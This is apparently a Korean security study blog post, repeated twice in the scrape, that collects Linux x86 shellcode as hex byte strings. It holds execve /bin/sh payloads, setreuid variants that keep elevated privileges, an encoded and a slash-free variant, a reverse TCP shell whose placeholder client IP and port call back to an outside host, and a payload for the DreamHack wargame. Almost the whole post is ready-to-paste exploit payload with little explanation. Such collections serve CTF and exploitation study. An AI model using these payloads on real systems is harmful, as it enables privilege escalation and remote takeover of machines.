0x01. 가장 기본적으로 쉘을 띄우는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
bytes : 25
미포함 : setreuid(), exit()
0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
bytes : 31
미포함 : setreuid()
0x03. setreuid(geteuid(), getreuid()) 까지 포함시킨 쉘 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
bytes : 41
0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
bytes : 47
0x04. exit(0) 코드
\x31\xc0\xb0\x01\xcd\x80
bytes : 6
0x05. setreuid(geteuid(), geteuid()) 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
bytes : 16
0x06. Linux/x86 execve /bin/sh shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
bytes : 23
0x07. linux x86 파일명 shellcode
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
bytes : 48
0x08. setreuid(geteuid(), geteuid()) system("/bin/sh")
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff
bytes : 54
0x09. 0x2f가 없는 쉘코드
\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3
0x0a Reverse TCP shellcode (84byte)
"\x68"+\
"\xc0\xa8\x7e\x8c"+\ #<- Client IP_ADDR
"\x5e\x66\x68"+\
"\x1e\x61"+\ #<- Client Port_ADDR
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+\
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+\
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+\
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+\
"\xeb\xce"
0x0b Ubuntu 16.04 shellcode (for DreamHack) (len 26)
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
'공부 > Reverse Engineering' 카테고리의 다른 글
| 중국 세무 프로그램에서 설치되는 백도어(Backdoor) (0) | 2024.06.20 |
|---|---|
| 스택(Stack) - sfp / ret (0) | 2021.02.19 |
| Test about Ransomware Behavior by Deactivating Trim in SSD - CryptoShield (0) | 2021.01.08 |
| Dharma, GandCrab, CLOP 동적분석 (0) | 2021.01.06 |
| 소프트웨어 해킹? Vulnerability (0) | 2020.07.11 |
0x01. 가장 기본적으로 쉘을 띄우는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
bytes : 25
미포함 : setreuid(), exit()
0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
bytes : 31
미포함 : setreuid()
0x03. setreuid(geteuid(), getreuid()) 까지 포함시킨 쉘 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
bytes : 41
0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
bytes : 47
0x04. exit(0) 코드
\x31\xc0\xb0\x01\xcd\x80
bytes : 6
0x05. setreuid(geteuid(), geteuid()) 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
bytes : 16
0x06. Linux/x86 execve /bin/sh shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
bytes : 23
0x07. linux x86 파일명 shellcode
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
bytes : 48
0x08. setreuid(geteuid(), geteuid()) system("/bin/sh")
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff
bytes : 54
0x09. 0x2f가 없는 쉘코드
\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3
0x0a Reverse TCP shellcode (84byte)
"\x68"+\
"\xc0\xa8\x7e\x8c"+\ #<- Client IP_ADDR
"\x5e\x66\x68"+\
"\x1e\x61"+\ #<- Client Port_ADDR
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+\
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+\
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+\
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+\
"\xeb\xce"
0x0b Ubuntu 16.04 shellcode (for DreamHack) (len 26)
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
'공부 > Reverse Engineering' 카테고리의 다른 글
| 중국 세무 프로그램에서 설치되는 백도어(Backdoor) (0) | 2024.06.20 |
|---|---|
| 스택(Stack) - sfp / ret (0) | 2021.02.19 |
| Test about Ransomware Behavior by Deactivating Trim in SSD - CryptoShield (0) | 2021.01.08 |
| Dharma, GandCrab, CLOP 동적분석 (0) | 2021.01.06 |
| 소프트웨어 해킹? Vulnerability (0) | 2020.07.11 |
